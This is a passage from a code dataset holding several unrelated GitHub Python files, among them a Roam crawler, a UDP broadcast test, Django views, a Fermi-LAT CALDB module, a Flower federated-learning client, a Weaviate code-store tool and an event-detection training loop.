urllib.request.urlretrieve(url, filepath)\n    db = pyroaman.load(filepath)\n    shutil.rmtree(dirpath)\n\n    return db\n\n\ndef timestamp_to_iso(timestamp: int) -> str:\n    timestamp /= 1000  # type: ignore\n    return datetime.fromtimestamp(timestamp).astimezone(pytz.utc).isoformat()\n\n\ndef render_block_content(block: 'pyroaman.Block') -> str:\n    \"\"\"Generates some HTML\"\"\"\n    html = block.string\n    html += '<ul>'\n    for child in block.children:\n        html += '<li>' + render_block_content(child) + '</li>'\n    html += '</ul>'\n    return html\n\n\ndef render_page_content(page: 'pyroaman.Block') -> str:\n    \"\"\"Generates some HTML\"\"\"\n    html = '<ul>'\n    for child in page.children:\n        html += '<li>' + render_block_content(child) + '</li>'\n    html += '</ul>
    '\n return html\n\n\ndef parse_database(db_id: str, db: pyroaman.database) -> Iterator[Dict]:\n for page in tqdm(db.pages):\n if 'uid' not in page.metadata:\n continue\n if not page.text:\n continue\n\n res = {\n 'source': 'roam-research',\n 'database': db_id,\n 'parsing_time': parsing_time,\n 'title': page.string,\n 'url': f\"https://roamresearch.com/#/app/{db_id}/page/{page.metadata['uid']}\",\n 'text': render_page_content(page)\n }\n if 'create-time' in page.metadata:\n res['create_time'] = timestamp_to_iso(page.metadata['create-time'])\n if 'edit-time' in page.metadata:\n res['edit_time'] = timestamp_to_iso(page.metadata['edit-time'])\n\n yield res\n\n\n@click.command()\ndef main():\n for db_id in DATABASES:\n logger.info(f'Downloading `{db_id}`')\n db = download_database(db_id)\n\n logger.info(f'Parsing `{db_id}`')\n parsed = list(parse_database(db_id, db))\n logger.info(f'Collected {len(parsed)} pages')\n\n logger.info(f'Saving `{db_id}`')\n for p in parsed:\n save_as_json(p)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"br-g/roam-sanity-preserver","sub_path":"scripts/crawl_roam.py","file_name":"crawl_roam.py","file_ext":"py","file_size_in_byte":2900,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"78"} +{"seq_id":"69925239612","text":"#!/usr/bin/env python3\n\nfrom time import sleep\nimport socket\nimport netsync\nimport netsync.rtp\n\ncast = \"broad\"\nprint(\"{}cast\".format(cast))\nif cast == \"uni\":\n\tgroup = \"10.0.0.150\"\nelif cast == \"broad\":\n\tgroup = \"255.255.255.255\"\nelif cast == \"multi\":\n\tgroup=\"224.69.69.1\"\n\tttl = 1\nport = 6969\n\nsock = netsync.rtp.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)\nsock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 2)\nif cast == \"multi\":\n\tsock.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, ttl)\nelif cast == \"broad\":\n\tsock.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)\n\n#sock.connect((group,port))\nfor t in range(10):\n\to=str(t).encode()\n\tprint(\"sending {}\".format(t))\n\tsock.sendto(o,(group,port))\n\tsleep(0.1)\n\n# send(bytes, flags)\n# sendall(bytes, flags)\n# sendto(bytes, address)\n# sendto(bytes, flags, address)\n# sendmsg(buffers, ancdata, flags, address)\n","repo_name":"jdimpson/netsync","sub_path":"t1.py","file_name":"t1.py","file_ext":"py","file_size_in_byte":894,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"29297636776","text":"from django.shortcuts import render, HttpResponseRedirect, redirect\nfrom django.contrib import messages\nfrom django.contrib.auth.decorators import login_required\n\nfrom .form import TickerForm, GroupForm, PortFolioForm\n\nimport datetime\n\n\n@login_required\ndef validate_create_ticker_form(request):\n form = TickerForm(request.POST or None)\n if form.is_valid():\n ticker = form.save()\n ticker.update_ticker_data(request)\n ticker.updated = datetime.datetime.now()\n ticker.save()\n return HttpResponseRedirect(request.META.get('HTTP_REFERER'))\n\n\n@login_required\ndef validate_create_group_form(request):\n form = GroupForm(request.POST or None)\n if form.is_valid():\n form.save()\n\n return redirect('portfolio:ticker_list_view')\n\n\n@login_required\ndef validate_portfolio_create_form(request):\n form = PortFolioForm(request.POST or None, initial={'user': request.user})\n if form.is_valid():\n new_portfolio = form.save()\n return HttpResponseRedirect(new_portfolio.get_absolute_url())\n return 
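`timestamp_to_iso` in the Roam crawler above divides a millisecond epoch by 1000 before converting to a UTC ISO string. The same round-trip using only the standard library (the record uses `pytz`; `datetime.timezone.utc` behaves the same for this purpose):

```python
from datetime import datetime, timezone

ms = 1_600_000_000_000                 # a millisecond Unix timestamp
iso = datetime.fromtimestamp(ms / 1000, tz=timezone.utc).isoformat()
print(iso)                             # 2020-09-13T12:26:40+00:00
```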
redirect('portfolio:portfolio_list_view')\n","repo_name":"Zefarak/finace-app","sub_path":"tickers/validate_views.py","file_name":"validate_views.py","file_ext":"py","file_size_in_byte":1094,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"793465899","text":"import subprocess\n\nfrom setuptools import setup, find_packages\n\nVERSION_NUMBER = \"1.2.8\"\n\ntry:\n GIT_BRANCH = subprocess.check_output([\"git\", \"rev-parse\", \"--abbrev-ref\", \"HEAD\"])\n GIT_BRANCH = GIT_BRANCH.decode() # convert to standard string\n GIT_BRANCH = GIT_BRANCH.rstrip() # remove unnecessary whitespace\nexcept:\n GIT_BRANCH = \"master\"\n\nif GIT_BRANCH == \"master\":\n DEVELOPMENT_STATUS = \"Development Status :: 5 - Production/Stable\"\n VERSION_NAME = VERSION_NUMBER\nelif GIT_BRANCH == \"beta\":\n DEVELOPMENT_STATUS = \"Development Status :: 4 - Beta\"\n VERSION_NAME = \"%s-beta\" % VERSION_NUMBER\nelif GIT_BRANCH == \"dev\":\n DEVELOPMENT_STATUS = \"Development Status :: 3 - Alpha\"\n VERSION_NAME = \"%s-dev\" % VERSION_NUMBER\nelse:\n print(\"Unknown git branch, using pre-alpha as default\")\n DEVELOPMENT_STATUS = \"Development Status :: 2 - Pre-Alpha\"\n VERSION_NAME = \"%s-%s\" % (VERSION_NUMBER, GIT_BRANCH)\n\n\ndef readme_type() -> str:\n import os\n if os.path.exists(\"README.rst\"):\n return \"text/x-rst\"\n if os.path.exists(\"README.md\"):\n return \"text/markdown\"\n\n\ndef readme() -> [str]:\n with open('README.rst') as f:\n return f.read()\n\n\ndef install_requirements() -> [str]:\n return read_requirements_file(\"requirements.txt\")\n\n\ndef test_requirements() -> [str]:\n return read_requirements_file(\"test_requirements.txt\")\n\n\ndef read_requirements_file(file_name: str):\n with open(file_name, encoding='utf-8') as f:\n requirements_file = f.readlines()\n return [r.strip() for r in requirements_file]\n\n\nsetup(\n name='raspyrfm_client',\n version=VERSION_NAME,\n description='A library to send rc signals with the RaspyRFM module',\n long_description=readme(),\n long_description_content_type=readme_type(),\n license='GPLv3+',\n author='Markus Ressel',\n author_email='mail@markusressel.de',\n url='https://github.com/markusressel/raspyrfm-client',\n packages=find_packages(exclude=['tests']),\n classifiers=[\n DEVELOPMENT_STATUS,\n 'License :: OSI Approved :: GNU General Public License v3 or later (GPLv3+)',\n 'Programming Language :: Python :: 3',\n 'Programming Language :: Python :: 3.4',\n 'Programming Language :: Python :: 3.5',\n 'Programming Language :: Python :: 3.6',\n 'Programming Language :: Python :: 3.7'\n ],\n install_requires=install_requirements(),\n tests_require=test_requirements()\n)\n","repo_name":"markusressel/raspyrfm-client","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2445,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"78"} +{"seq_id":"8738647345","text":"\"\"\"\nModule to provide access to CALDB information\n\n$Header: /nfs/slac/g/glast/ground/cvs/pointlike/python/uw/irfs/caldb.py,v 1.5 2018/01/27 15:35:06 burnett Exp $\nAuthor: Eric Wallace\n\n\"\"\"\n__version__ = '$Revision: 1.5 $'\n\nimport os\n\nimport numpy as np\nfrom astropy.io import fits\n\nfrom uw.utilities import keyword_options\nfrom . import IrfError\n\nclass CALDBError(IrfError):\n pass\n\nclass CALDB(object):\n\n \"\"\"An object to keep track of the LAT CALDB information.\n \n Parameters\n ----------\n CALDB_dir\n Path to CALDB directory. 
Environment variables will be expanded.\n Defaults to $CALDB. The specified directory must have a\n subdirectory 'data/glast/lat', containing a CALDB index file\n named 'caldb.indx'. \n\n Attributes\n ----------\n CALDB_dir\n Absolute path to the directory specified by the `CALDB_dir` init\n parameter.\n index\n FITS HDU containing CALDB index data\n\n Methods\n -------\n list_irfs\n Prints a list of available irfs from the CALDB index, optionally\n filtered by selections specified with the same keyword arguments\n as __call__.\n \"\"\"\n\n event_type_names = ('front','back', 'psf0','psf1','psf2','psf3','edisp0',\n 'edisp1','edisp2','edisp3')\n event_type_partitions = dict(fb = ('front','back'),\n psf = ('psf0','psf1','psf2','psf3'),\n edisp = ('edisp0','edisp1','edisp2','edisp3'))\n\n event_type_partitions = dict(fb = (0,1),\n psf = (2,3,4,5),\n edisp = (6,7,8,9))\n def __init__(self,CALDB_dir, irfname):\n self.CALDB_dir = os.path.abspath(os.path.expandvars(CALDB_dir))\n self.index = self._load_caldb_index()\n self.irf=irfname\n t = self.irf.split('_')\n self.event_class=t[1]\n self.version = t[0]+'_'+t[2]\n \n def __repr__(self):\n return \"{self.__class__}\\n CALDB_dir: {self.CALDB_dir},\\\n \\n event_class: {self.event_class} \\n version : {self.version}\".format(self=self)\n\n def _load_caldb_index(self):\n if not os.path.exists(self.CALDB_dir):\n raise CALDBError('CALDB directory {} not found.'.format(self.CALDB_dir))\n index_file = os.path.join(self.CALDB_dir,'data','glast','lat','caldb.indx')\n if os.path.exists(index_file):\n return fits.getdata(index_file,'CIF')\n elif os.path.exists(os.path.join(self.CALDB_dir,'caldb.indx')):\n return fits.getdata(os.path.join(self.CALDB_dir,'caldb.indx'),'CIF')\n raise CALDBError('No CALDB index found in {}'.format(self.CALDB_dir))\n \n def filenames(self, irf):\n \"\"\" for compatibility with old code: return a list of filenames in order fb,psf\n \"\"\"\n return [self(irf, event_type=et)['filename'] for et in range(6)] \n \n def get_aeff(self):\n return self.filenames('aeff')\n def get_psf(self,):\n return self.filenames('psf')\n\n def __call__(self,irf,version=None,event_class=None,event_type='fb'):\n \"\"\"Return the filenames and FITS extensions for a given irf.\n \n Parameters\n ----------\n\n irf : {'psf','aeff','edisp'}\n The IRF to find files for.\n version : str\n IRF version to look up files for (e.g., 'P6_V1','P7_V6',\n 'P7REP_V6','P8R2_V15'). Default is \"P8R2_V6\".\n event_class : str\n Event class selection to find IRFs for (e.g., \"source\", \"clean\",\n \"diffuse\"). Default is \"source\". Bitmask values are not currently\n recognized.\n event_type : str or int\n Event type ('front','back','psf0', etc) to find files for. Integer\n indices are also accepted (0-9 for ('front', 'back', 'psf0', ...,\n 'edisp3'), respectively). May also be one of ('fb','psf','edisp'),\n in which case information will be returned for all event types in\n the specified set. Default is 'fb'.\n\n Returns\n -------\n\n irf_info : dict\n If a single event type is requested, the return value is a dict\n with keys \"filename\" and \"extensions\". \"filename\" is the path to\n the FITS file containing the description of the requested IRF.\n \"extensions\" is another dict in which the keys and values are the\n names and extensions numbers for each of the FITS extensions for\n the specified irf (e.g., 'RPSF', 'PSF_SCALING', and 'FISHEYE_CORR'\n for the PSF file). 
\n\n If multiple event types are requested, the return value is a dict\n in which the keys are the event type names and the values are dicts\n of the form described above.\n \"\"\"\n # First use default values\n if version is None: version = self.version\n if event_class is None: event_class=self.event_class\n\n irf_entries = self._filter(irf=irf, version=version,\n event_class=event_class, event_type=event_type)\n def irf_dict(entries):\n #Assume all entries passed to this function are for the same file.\n filename = os.path.join(self.CALDB_dir,entries[0]['CAL_DIR'],\n entries[0]['CAL_FILE'])\n extensions = {cname:extension for cname,extension in \n zip(entries['CAL_CNAM'],entries['CAL_XNO'])}\n return dict(filename=filename,extensions=extensions)\n\n ets = np.asarray(self._parse_event_type(np.char.strip(irf_entries['DETNAM'])))\n ets_unique = np.unique(ets)\n if ets_unique.shape[0]==1:\n return irf_dict(irf_entries)\n else:\n return {et:irf_dict(irf_entries[ets==et]) for et in ets_unique}\n \n if event_type is not None:\n event_type = self._parse_event_type(event_type)\n if hasattr(event_type,'__iter__'):\n return {et:irf_dict(et) for et in event_type}\n else:\n return irf_dict(event_type)\n \n def _filter(self,irf=None,version=None,event_class=None,event_type=None):\n \"\"\"Return CALDB index entries filtered according to the provided criteria.\"\"\"\n def _parse_filenames(filenames):\n filenames = np.char.rpartition(np.char.lower(filenames),'.')[:,0]\n #Add a missing underscore for the P7 irfs for easier processing\n for ec in ('transient','source','clean','ultraclean'):\n filenames = np.char.replace(filenames,'p7'+ec,'p7_'+ec)\n tokens = np.char.strip(np.vstack(np.char.split(filenames,'_')))\n p6mask = (tokens[:,1]=='p6')\n #Handle the reversed version/event class order for P6 irfs\n tokens[p6mask,2],tokens[p6mask,3] = tokens[p6mask,3],tokens[p6mask,2]\n irf,pass_ver,ec,ver,et = tokens.T\n ver = np.array(['_'.join(x) for x in zip(pass_ver,ver)])\n return irf,ver,ec\n\n mask = np.ones_like(self.index,dtype='bool') \n \n\n for val,selection in zip(_parse_filenames(self.index.CAL_FILE),(irf,version,event_class)):\n if selection is None:\n selection = val\n mask &= (val==np.char.lower(selection))\n\n if event_type is None:\n et = list(range(10))\n else:\n et = self._parse_event_type(event_type)\n if hasattr(et,\"__iter__\"):\n etmask = np.zeros_like(mask)\n for e in et:\n e = self.event_type_names[e]\n etmask |= (e==np.char.lower(np.char.strip(self.index.DETNAM)))\n else:\n et = self.event_type_names[et]\n etmask = (et==np.char.lower(np.char.strip(self.index.DETNAM)))\n\n mask &= etmask\n\n return self.index[mask]\n\n def _event_type_lookup(self,event_type):\n \"\"\"Find the event type or types for a given event_type selection\"\"\" \n if hasattr(event_type,'__iter__'):\n return [self._event_type_lookup(et) for et in event_type]\n try:\n et = event_type.lower()\n except AttributeError: #Not a string, assume index\n try:\n et = self.event_type_names[event_type]\n except IndexError:\n msg = \"Invalid event type index {}. 
Should be 0-9.\".format(\n event_type, self.event_type_names)\n raise IrfError(msg)\n\n if et in self.event_type_names:\n return et\n\n try:\n return self.event_type_partitions[et]\n except KeyError:\n raise IrfError(\"Invalid event type {}\".format(et))\n\n def _parse_event_type(self,event_type):\n \"\"\"Find the event type or types for a given event_type selection\"\"\" \n if hasattr(event_type,'__iter__'):\n return [self._parse_event_type(et) for et in event_type]\n\n try:\n event_type = event_type.lower()\n except AttributeError: #Not a string, assume index\n if event_type in range(10):\n return event_type\n else:\n raise IrfError(\"Invalid event type index {}. Should be 0-9.\".format(event_type))\n\n try:\n return self.event_type_names.index(event_type)\n except ValueError as exc:\n try: return self.event_type_partitions[event_type]\n except KeyError:\n raise exc\n\n def list_irfs(self,**selections):\n \"\"\"List available IRFs matching the given selections.\n\n Available selections are:\n\n version\n IRF version (e.g. 'P8R2_V6','P6_V3','P7REP_V6')\n event_class\n Event class (e.g. 'source','diffuse','clean')\n event_type_partition\n Event type partition (one of 'fb', 'psf', 'edisp').\n Overridden by event_type selection, if provided. \n Otherwise, all types of the selected partition are displayed.\n event_type\n Event type ('front','back','psf0', etc). Integer indices\n are also accepted (0-9 for ('front','back','PSF0',...,'EDISP3'))\n \"\"\"\n\n def _format_names(names,indent=2,width=100):\n \"\"\"Pretty print irf names in columns.\n\n irfnames\n Names to print.\n indent [2]\n Spaces to indent the list\n width [100]\n Total width of the display\n \"\"\"\n wordwidth = names.dtype.itemsize\n names = np.unique(['{:<{w}s}'.format(n,w=wordwidth) for n in names])\n names.sort()\n sep = ' '*4\n ncols = (width-indent)//(wordwidth+4)\n names = np.append(names,[' '*wordwidth]*(ncols-names.shape[0]%ncols))\n names = names.reshape(ncols,names.shape[0]//ncols).T\n return [' '*indent+sep.join(ns) for ns in names]\n\n entries = self._filter(**selections)\n if entries.shape[0]==0:\n print(\"No available IRFs matching the provided selections.\")\n return\n names = np.char.partition(entries.CAL_FILE,'_')[:,2]\n names = np.char.partition(names,'.')[:,0]\n if np.all([s is None for s in selections.values()]):\n st = 'Displaying all available IRFs:\\n'\n else:\n st = 'Displaying available IRFs with ' \n st += ', '.join(['{}={}'.format(k,v) for k,v in selections.items()\n if v is not None])\n st += \":\\n\"\n st += \"\\n\".join(_format_names(names))\n print(st)\n\n\n\n\n\n","repo_name":"fermi-lat/pointlike","sub_path":"python/uw/irfs/caldb.py","file_name":"caldb.py","file_ext":"py","file_size_in_byte":11722,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"22595146693","text":"from collections import OrderedDict\n\nimport torch\nfrom torch.utils.data import DataLoader\nfrom model import *\nimport flwr as fl\nimport sys\n\nDEVICE = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n\ndef load_data(train_dir, test_dir):\n \"\"\"Load CIFAR-10 (training and test set).\"\"\"\n test = torch.load(test_dir)\n train = torch.load(train_dir)\n trainloader = DataLoader(train, batch_size=32, shuffle=True)\n testloader = DataLoader(test, batch_size=32)\n num_examples = {\"trainset\" : len(train), \"testset\" : len(test)}\n return trainloader, testloader, num_examples\n\nclass CifarClient(fl.client.NumPyClient):\n def get_parameters(self):\n 
return get_model_parameters(net)\n\n # def set_parameters(self, parameters):\n # params_dict = zip(net.state_dict().keys(), parameters)\n # state_dict = OrderedDict({k: torch.tensor(v) for k, v in params_dict})\n # net.load_state_dict(state_dict, strict=True)\n\n def fit(self, parameters, config):\n set_model_parameters(net, parameters)\n train(net, trainloader, epochs=1)\n return list(self.get_parameters()), num_examples[\"trainset\"], {\"accuracy\": 0}\n\n def evaluate(self, parameters, config):\n set_model_parameters(net, parameters)\n loss, accuracy = test(net, testloader)\n return float(loss), num_examples[\"testset\"], {\"accuracy\": float(accuracy)}\n\n\nif __name__ == \"__main__\":\n# Load model and data\n \n\n net = Net().to(DEVICE)\n test_dir = 'testing/test.pt'\n train_dir = 'training/train' + sys.argv[1] + '.pt'\n trainloader, testloader, num_examples = load_data(train_dir, test_dir)\n fl.client.start_numpy_client(\"10.128.0.2:5040\", client=CifarClient())\n #fl.client.start_numpy_client(\"localhost:8040\", client=CifarClient())","repo_name":"j2zhao/federated_learning","sub_path":"neural_network_simple/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":1784,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"74752424571","text":"import requests\nimport json\nimport tiktoken\nimport weaviate\nimport os\nimport openai\n\nfrom github import Github\nfrom github import Auth\nfrom github.ContentFile import ContentFile\nfrom weaviate.util import generate_uuid5\n\nfrom typing import Type, Optional\nfrom pydantic import BaseModel, Field\nfrom superagi.tools.base_tool import BaseTool\n\nclass RicaiCodestoreUpdateSchema(BaseModel):\n repository: str = Field(..., description=\"The Github repository to use for testing\")\n\nclass RicaiCodestoreUpdateTool(BaseTool):\n \"\"\"\n RicAI Update Database with latest code tool\n\n Attributes:\n name : The name.\n description : The description.\n args_schema : The args schema.\n \"\"\"\n name = \"RicaiCodestoreUpdate\"\n description = (\n \"A tool for updating the code database with latest code from Github.\"\n )\n args_schema: Type[RicaiCodestoreUpdateSchema] = RicaiCodestoreUpdateSchema\n\n class Config:\n arbitrary_types_allowed = True\n \n def __init__(self):\n \"\"\"\n Initializes the RicaiCodestoreHelper with the provided Weaviate and Github credentials.\n\n Args:\n Weaviate_url (str): weaviate database connection url.\n Weaviate_api_key (str): weaviate database connection API key.\n Openai_api_key (str): OpenAI API key.\n \"\"\"\n self.w_client = weaviate.Client(\n url=self.get_tool_config(\"WEAVIATE_URL\"),\n auth_client_secret=weaviate.AuthApiKey(\n api_key=self.get_tool_config(\"WEAVIATE_API_KEY\")\n ),\n additional_headers={\n \"X-OpenAI-Api-Key\": self.get_tool_config(\"OPENAI_API_KEY\")\n },\n )\n\n self.openai_key = self.get_tool_config(\"OPENAI_API_KEY\")\n\n class_obj = {\n \"class\": \"Codefile\",\n \"vectorizer\": \"text2vec-openai\",\n \"moduleConfig\": {\n \"text2vec-openai\": {\n \"model\": \"gpt-3.5-turbo-16k\",\n },\n },\n \"properties\": [\n {\n \"name\": \"file_path\",\n \"dataType\": [\"text\"],\n \"description\": \"Path to code file\",\n },\n {\n \"name\": \"github_url\",\n \"dataType\": [\"text\"],\n \"description\": \"Github url of code file\",\n \"moduleConfig\": {\n \"text2vec-openai\": {\n \"skip\": True\n }\n },\n },\n {\n \"name\": \"type\",\n \"dataType\": [\"text\"],\n \"description\": \"Type of the file\",\n \"moduleConfig\": {\n 
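In the Flower client record above, `get_model_parameters` and `set_model_parameters` are imported from `model.py`, which is not part of the record; the commented-out `set_parameters` method suggests the usual NumPy/state_dict round-trip. A sketch of what those helpers presumably look like:

```python
from collections import OrderedDict
import torch

def get_model_parameters(net):
    # Export weights as a list of NumPy arrays (Flower's NumPyClient format).
    return [val.cpu().numpy() for val in net.state_dict().values()]

def set_model_parameters(net, parameters):
    # Rebuild the state_dict in key order and load it back into the module.
    params_dict = zip(net.state_dict().keys(), parameters)
    state_dict = OrderedDict({k: torch.tensor(v) for k, v in params_dict})
    net.load_state_dict(state_dict, strict=True)
```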
\"text2vec-openai\": {\n \"skip\": True\n }\n },\n },\n {\n \"name\": \"repo\",\n \"dataType\": [\"text\"],\n \"description\": \"The code repository in Github\",\n \"moduleConfig\": {\n \"text2vec-openai\": {\n \"skip\": True\n }\n },\n },\n {\n \"name\": \"content\",\n \"dataType\": [\"text\"],\n \"description\": \"File content (code)\",\n },\n ],\n }\n self.w_client.schema.create_class(class_obj)\n\n # Github setup\n ghub_auth = Auth.Token(self.get_tool_config(\"GITHUB_ACCESS_TOKEN\"))\n ghub = Github(auth=ghub_auth)\n self.ghub_user = ghub.get_user(self.get_tool_config(\"GITHUB_USERNAME\"))\n\n def _execute(self, repository: str):\n \"\"\"\n Execute the RicAI Update Database with latest code tool.\n\n Args:\n repository: The Github repository to use for testing\n\n Returns:\n Nothing if successful. or error message.\n \"\"\"\n def upsert_codebase(ghub_repo_name):\n repo = self.ghub_user.get_repo(ghub_repo_name)\n contents = repo.get_contents(\"\")\n codefiles = []\n\n # TODO: populate with more ignorable file types\n ignore_extensions = [\n \".jpg\", \".jpeg\", \".png\", \".gif\", \".bmp\", \".tiff\", \".ico\", \".svg\",\n \".mp4\", \".avi\", \".mkv\", \".mov\", \".wmv\", \".flv\",\n \".mp3\", \".wav\", \".ogg\", \".aac\", \".flac\", \".wma\",\n \".pdf\", \".doc\", \".docx\", \".ppt\", \".pptx\", \".xls\", \".xlsx\", \".odt\", \".ods\", \".odp\",\n \".zip\", \".rar\", \".tar\", \".gz\", \".7z\",\n \".exe\", \".dll\", \".app\", \".apk\", \".iso\", \".img\", \".dmg\",\n ]\n\n while contents:\n file = contents.pop(0)\n if file.type == \"dir\":\n contents.extend(repo.get_contents(file.path))\n else:\n extension = os.path.splitext(file.name)[1].lower()\n if extension not in ignore_extensions:\n print(file.path)\n file_content = file.decoded_content.decode(\"utf-8\")\n codefiles.append({\n \"file_path\": file.path,\n \"github_url\": file.url,\n \"type\": file.type,\n \"repo\": file.repository,\n \"content\": file_content\n })\n file.last_modified\n\n # TODO: check if code from specific repo/codebase in Github is already present in the vector database\n # TODO: make sure that deterministic uuid generation works \n class_name = \"Codefile\"\n with self.w_client.batch() as batch:\n for codefile in codefiles:\n batch.add_data_object(\n codefile, \n class_name,\n uuid=generate_uuid5(identifier=codefile[\"path\"], namespace=codefile[\"repo\"])\n )\n return True\n \n try: \n result = upsert_codebase(repository)\n return f'Codebase updated successfully - {result}'\n except Exception as err:\n return f\"Error: Unable to update codebase with latest code - {err}\"","repo_name":"liskovich/RicAI_CodeStore","sub_path":"ricai_codestore_update.py","file_name":"ricai_codestore_update.py","file_ext":"py","file_size_in_byte":6394,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"13013154114","text":"import time\nfrom data_util import ACEDataset, pad_trig\nfrom transformer import Trasformer\nfrom util import load_models, set_loss_optim, cal_prf\nfrom multi_instance_learning import MILLoss # use MIL method\nimport torch\nimport torch.utils.data as torch_data\nimport torch.nn.functional as F\nimport sys\n\nTab = '\\t'\n\n\ndef trainFunc(args, ace_data, debug=False):\n # put ace digit data into pytorch DataLoader\n train_loader = torch_data.DataLoader(ACEDataset(ace_data.train), batch_size=args.batch_size, shuffle=True,\n collate_fn=pad_trig)\n dev_loader = torch_data.DataLoader(ACEDataset(ace_data.dev), batch_size=args.batch_size, shuffle=False,\n 
                                       collate_fn=pad_trig)\n    test_loader = torch_data.DataLoader(ACEDataset(ace_data.test), batch_size=args.batch_size, shuffle=False,\n                                        collate_fn=pad_trig)\n\n    # init models\n    # decoder = TrigRNN(args)\n    decoder = Trasformer(args)\n    decoder = decoder.to(args.device)\n    # decoder = decoder.cuda()\n    # print(decoder)\n    # sys.exit(0)\n    decoder.word_embeddings.weight.data.copy_(torch.from_numpy(ace_data.pretrain_embedding))\n    parameters = list(decoder.parameters())\n    loss_function, optimizer = set_loss_optim(parameters, args.loss_flag, args.opti_flag, args.lr)\n    loss_function_mil = MILLoss(mode='min')  # matches the MILLoss imported from multi_instance_learning above\n    # loss_function_mil = MILLoss(mode='max')\n    # training\n    best_f1 = -1.0\n    best_epoch = -1\n    for epoch in range(args.epoch_num):\n        training_id = 0\n        loss_all = 0\n        st_time = time.time()\n        k = 0\n        for iteration, batch in enumerate(train_loader):\n            # if iteration>30:\n            #     break\n            sentence_in, targets, batch_sent_lens, mask = batch\n            g = max(batch_sent_lens.cpu().numpy())\n            if (g > k):\n                k = g\n            sentence_in, targets, batch_sent_lens, mask = sentence_in.to(args.device), targets.to(\n                args.device), batch_sent_lens.to(args.device), mask.to(args.device)\n            decoder.zero_grad()\n\n            tag_space = decoder(sentence_in, batch_sent_lens)\n            targets_masked = targets + (1 - mask).long() * -1\n            if iteration % 2 == 0:\n                loss = 0.02 * loss_function_mil.forward(tag_space, targets_masked.view(-1).cpu())\n            else:\n                loss = loss_function(tag_space, targets_masked.view(-1))\n\n            loss_all += loss.data.item()\n            loss.backward()\n            optimizer.step()\n            training_id += sentence_in.size(0)\n            output_loss = [\"%.2f\" % i for i in [loss.data.item(), loss_all]]\n            print('iteration', iteration, 'loss', output_loss)\n\n        # record best result on dev\n        eval_results = eval_model(dev_loader, decoder, loss_function, args, data_flag=\"dev\")\n\n        current_f1 = float(eval_results[1][-1])\n        # print(eval_results[1][-1])\n        if current_f1 > best_f1:\n            best_f1 = current_f1\n            best_epoch = epoch\n            torch.save(decoder, args.model_path)\n        print('Epoch', epoch, 'result', eval_results, \"Best epoch\", best_epoch, 'best_f1', best_f1)\n        if epoch - best_epoch == args.early_stop: break\n        decoder.train()\n\n\n    eval_results = eval_model(train_loader, decoder, loss_function, args, data_flag=\"train\")\n    output_model_result(eval_results, epoch, \"train\", args)\n\n    # final result on test\n    best_decoder = load_models(args.model_path)\n    eval_flag = \"test\"\n    eval_results = eval_model(test_loader, best_decoder, loss_function, args, vocab=ace_data.vocab,\n                              tags_data=ace_data.atag_dict, data_flag=eval_flag)\n    result = output_model_result(eval_results, epoch, eval_flag, args)\n    return result\n\n\ndef output_model_result(eval_results, epoch, eval_flag, args):\n    loss, prf, prf_iden = eval_results\n    f1 = prf[-1]\n    loss = \"%.2f\" % loss\n    print(eval_flag, \"results, epoch\", epoch, Tab, loss, time.asctime())\n    print(\"##--Classification\", Tab, prf[0], Tab, prf[1], Tab, prf[2], Tab, \"##-- iden:\", prf_iden[0], Tab, prf_iden[1],\n          Tab, prf_iden[2])\n    return [prf[0], prf[1], prf[2], prf_iden[0], prf_iden[1], prf_iden[2]]\n\n\ndef eval_model(data_loader, decoder, loss_function, args, vocab=None, tags_data=None, data_flag=None):\n    decoder.eval()\n    loss_all = 0\n    common = 0\n    common_iden = 0\n    gold = 0\n    pred = 0\n\n    for iteration, batch in enumerate(data_loader):\n        sentence_in, targets, batch_sent_lens, mask = batch\n        # batch_sent_lens holds the length of every sentence in the batch\n        sentence_in, targets, batch_sent_lens, mask = sentence_in.to(args.device), targets.to(\n            args.device), batch_sent_lens.to(args.device), mask.to(args.device)\n        bsize = sentence_in.size(0)  # bsize is 100 for every batch except the last one\n        slen = sentence_in.size(1)  # slen = length of the longest sentence in the batch\n        decoder.zero_grad()\n\n        tag_space = decoder(sentence_in, batch_sent_lens)\n\n        targets_masked = targets + (1 - mask).long() * -1\n\n        loss = loss_function(tag_space, targets_masked.view(-1)).data.item()\n        loss_all += loss  # accumulate, otherwise the returned loss is always 0\n        pred_trig_mask_4output = mask.float().unsqueeze(2).expand(bsize, slen, args.tagset_size).contiguous().view(\n            bsize * slen, -1)\n\n        # log_softmax\n        _, tag_outputs = ((F.log_softmax(tag_space, dim=1)).data * pred_trig_mask_4output).max(1)\n\n        gold_targets = targets.cpu().data.view(bsize, slen).numpy().tolist()\n        pred_outputs = tag_outputs.cpu().view(bsize, -1).numpy().tolist()\n\n\n        # statistic common, pred, gold for prf\n        for target_doc, out_doc in zip(gold_targets, pred_outputs):\n\n            for wid, (gitem, oitem) in enumerate(zip(target_doc, out_doc)):\n\n                if gitem != 0: gold += 1\n                if oitem != 0: pred += 1\n                if gitem == oitem and (gitem != 0): common += 1  # classification\n                if (gitem != 0) and (oitem != 0): common_iden += 1  # identification\n\n    print(\"common:\", common, pred, gold)\n    prf = cal_prf(common, pred, gold)\n    prf_iden = cal_prf(common_iden, pred, gold)\n    eval_results = [loss_all, prf, prf_iden]\n    return eval_results\n","repo_name":"gitofding/event-detection","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":6291,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"2426511171","text":"import 